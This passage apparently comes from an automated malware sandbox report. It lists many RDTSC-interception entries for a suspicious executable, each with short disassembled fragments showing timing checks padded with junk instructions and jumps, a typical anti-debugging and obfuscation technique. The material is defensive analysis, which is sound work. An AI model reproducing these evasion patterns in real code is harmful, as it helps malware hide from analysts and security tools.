              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D70D second address: 73D726 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D726 second address: 73D72C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D72C second address: 73D752 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9F08C2F7E8h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D752 second address: 73D758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D87B second address: 73D8DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9F08C2F7E8h 0x00000008 js 00007F9F08C2F7D6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 ja 00007F9F08C2F7D6h 0x0000001a pop eax 0x0000001b jnp 00007F9F08C2F7EDh 0x00000021 jmp 00007F9F08C2F7E7h 0x00000026 popad 0x00000027 nop 0x00000028 movsx ecx, ax 0x0000002b push 00000000h 0x0000002d mov esi, dword ptr [ebp+122D2AD9h] 0x00000033 push 1B9486EDh 0x00000038 pushad 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D8DC second address: 73D988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F9F08C2E4B6h 0x0000000a popad 0x0000000b jl 00007F9F08C2E4BCh 0x00000011 je 00007F9F08C2E4B6h 0x00000017 popad 0x00000018 xor dword ptr [esp], 1B94866Dh 0x0000001f push 00000000h 0x00000021 push ecx 0x00000022 call 00007F9F08C2E4B8h 0x00000027 pop ecx 0x00000028 mov dword ptr [esp+04h], ecx 0x0000002c add dword ptr [esp+04h], 00000018h 0x00000034 inc ecx 0x00000035 push ecx 0x00000036 ret 0x00000037 pop ecx 0x00000038 ret 0x00000039 jng 00007F9F08C2E4BBh 0x0000003f mov edi, 3B0B141Bh 0x00000044 movzx ecx, di 0x00000047 add dword ptr [ebp+122D2538h], edi 0x0000004d push 00000003h 0x0000004f je 00007F9F08C2E4B6h 0x00000055 push 00000000h 0x00000057 jnl 00007F9F08C2E4BCh 0x0000005d mov edi, dword ptr [ebp+122D2CB2h] 0x00000063 push 00000003h 0x00000065 pushad 0x00000066 call 00007F9F08C2E4BAh 0x0000006b movsx eax, dx 0x0000006e pop edx 0x0000006f mov esi, dword ptr [ebp+122D2D06h] 0x00000075 popad 0x00000076 call 00007F9F08C2E4B9h 0x0000007b jmp 00007F9F08C2E4C5h 0x00000080 push eax 0x00000081 push eax 0x00000082 push edx 0x00000083 push edx 0x00000084 pushad 0x00000085 popad 0x00000086 pop edx 0x00000087 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D988 second address: 73D999 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9F08C2F7DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D999 second address: 73D9A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D9A9 second address: 73D9CC instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9F08C2F7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov eax, dword ptr [eax] 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F9F08C2F7E3h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D9CC second address: 73DA11 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9F08C2E4B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007F9F08C2E4C6h 0x00000014 pop eax 0x00000015 or edx, dword ptr [ebp+122D2C8Eh] 0x0000001b lea ebx, dword ptr [ebp+124584D8h] 0x00000021 add cx, 8F88h 0x00000026 xchg eax, ebx 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F9F08C2E4BAh 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 75E9C5 second address: 75E9D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 75E9D2 second address: 75E9E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4BBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 75E9E1 second address: 75E9E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 75E9E7 second address: 75E9FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4BEh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 75CAE0 second address: 75CAE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 75CAE4 second address: 75CAEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 75CAEA second address: 75CB40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F9F08C2F7DBh 0x0000000c jmp 00007F9F08C2F7E9h 0x00000011 jnc 00007F9F08C2F7D6h 0x00000017 jmp 00007F9F08C2F7E2h 0x0000001c popad 0x0000001d push eax 0x0000001e push ebx 0x0000001f jnc 00007F9F08C2F7D6h 0x00000025 jng 00007F9F08C2F7D6h 0x0000002b pop ebx 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 75CB40 second address: 75CB55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F9F08C2E4BDh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 75D6E1 second address: 75D6E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 75D988 second address: 75D98E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 75D98E second address: 75D992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 727138 second address: 727155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jp 00007F9F08C2E4BEh 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007F9F08C2E4B6h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 75DB1E second address: 75DB22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 75DB22 second address: 75DB26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 75DB26 second address: 75DB2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 75DB2F second address: 75DB35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 75E437 second address: 75E458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F9F08C2F7D6h 0x0000000a popad 0x0000000b jne 00007F9F08C2F7E3h 0x00000011 jmp 00007F9F08C2F7DDh 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 75E458 second address: 75E45E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 762236 second address: 762250 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9F08C2F7DEh 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 762250 second address: 762254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 762254 second address: 76225E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9F08C2F7D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 76225E second address: 762285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edi 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e jmp 00007F9F08C2E4C3h 0x00000013 pop eax 0x00000014 push ecx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 762285 second address: 76228A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 76228A second address: 762291 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 769DAE second address: 769DB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 769DB4 second address: 769DE3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9F08C2E4B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f jmp 00007F9F08C2E4C7h 0x00000014 jnp 00007F9F08C2E4B6h 0x0000001a push edi 0x0000001b pop edi 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 72A53B second address: 72A556 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F9F08C2F7E4h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 76924B second address: 76924F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 7694E8 second address: 7694EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 7699E7 second address: 769A15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4C0h 0x00000007 pushad 0x00000008 jmp 00007F9F08C2E4C9h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 769A15 second address: 769A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9F08C2F7DCh 0x00000010 pushad 0x00000011 jnl 00007F9F08C2F7D6h 0x00000017 push edi 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 769A37 second address: 769A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F08C2E4BCh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 769A48 second address: 769A4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 769A4E second address: 769A52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 769A52 second address: 769A68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7E2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 769BC2 second address: 769BD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 769BD2 second address: 769C1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F9F08C2F7D6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 pop eax 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 pushad 0x0000001a jmp 00007F9F08C2F7E6h 0x0000001f push eax 0x00000020 pop eax 0x00000021 jmp 00007F9F08C2F7DDh 0x00000026 jnl 00007F9F08C2F7D6h 0x0000002c popad 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 push ecx 0x00000032 pop ecx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 76C1DD second address: 76C1FF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9F08C2E4B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jmp 00007F9F08C2E4BAh 0x00000010 pop edi 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 76C1FF second address: 76C205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 76C2CC second address: 76C2D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 76C8DF second address: 76C8E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 76C8E3 second address: 76C930 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 je 00007F9F08C2E4C2h 0x0000000e jmp 00007F9F08C2E4BCh 0x00000013 xchg eax, ebx 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007F9F08C2E4B8h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 00000014h 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e mov dword ptr [ebp+12483299h], ebx 0x00000034 mov edi, dword ptr [ebp+122D3C37h] 0x0000003a push eax 0x0000003b pushad 0x0000003c js 00007F9F08C2E4BCh 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 76CA0F second address: 76CA13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 76CA13 second address: 76CA19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 76CF30 second address: 76CF34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 76CF34 second address: 76CF76 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F9F08C2E4BBh 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F9F08C2E4B8h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 or edi, dword ptr [ebp+122D2CB6h] 0x0000002e xchg eax, ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pop edx 0x00000034 pop eax 0x00000035 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 76DD7F second address: 76DD83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 76DB76 second address: 76DB7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 76DD83 second address: 76DD87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 76DB7B second address: 76DB81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 76DD87 second address: 76DD8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 76DD8D second address: 76DDA8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9F08C2E4B8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007F9F08C2E4BCh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 76DDA8 second address: 76DDAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 76DDAE second address: 76DDB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 76E53D second address: 76E541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 76F79C second address: 76F7A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 76F7A2 second address: 76F7A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 76F7A6 second address: 76F7AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 770330 second address: 770387 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9F08C2F7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push esi 0x0000000d xor esi, 36593249h 0x00000013 pop esi 0x00000014 push 00000000h 0x00000016 mov dword ptr [ebp+122D2574h], eax 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ebp 0x00000021 call 00007F9F08C2F7D8h 0x00000026 pop ebp 0x00000027 mov dword ptr [esp+04h], ebp 0x0000002b add dword ptr [esp+04h], 0000001Bh 0x00000033 inc ebp 0x00000034 push ebp 0x00000035 ret 0x00000036 pop ebp 0x00000037 ret 0x00000038 mov esi, dword ptr [ebp+122D1E15h] 0x0000003e xchg eax, ebx 0x0000003f push ebx 0x00000040 jl 00007F9F08C2F7D8h 0x00000046 pushad 0x00000047 popad 0x00000048 pop ebx 0x00000049 push eax 0x0000004a push ebx 0x0000004b pushad 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 7700D8 second address: 7700DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 7718A9 second address: 7718C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 771662 second address: 771688 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F9F08C2E4BAh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F9F08C2E4C1h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 775181 second address: 77518A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 77518A second address: 775226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F9F08C2E4B8h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 mov bx, 916Fh 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push esi 0x0000002c call 00007F9F08C2E4B8h 0x00000031 pop esi 0x00000032 mov dword ptr [esp+04h], esi 0x00000036 add dword ptr [esp+04h], 00000016h 0x0000003e inc esi 0x0000003f push esi 0x00000040 ret 0x00000041 pop esi 0x00000042 ret 0x00000043 call 00007F9F08C2E4C7h 0x00000048 or dword ptr [ebp+122D3B71h], ecx 0x0000004e pop ebx 0x0000004f clc 0x00000050 je 00007F9F08C2E4BCh 0x00000056 mov edi, dword ptr [ebp+122D2DD6h] 0x0000005c push 00000000h 0x0000005e push esi 0x0000005f mov dword ptr [ebp+122D1E61h], edi 0x00000065 pop edi 0x00000066 xchg eax, esi 0x00000067 jmp 00007F9F08C2E4BDh 0x0000006c push eax 0x0000006d pushad 0x0000006e push eax 0x0000006f push edx 0x00000070 jo 00007F9F08C2E4B6h 0x00000076 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 77539E second address: 7753A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 7753A4 second address: 7753A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 7753A9 second address: 7753AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ARoqFi68Nr.exe RDTSC instruction interceptor: First address: 7771CB second address: 7771CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
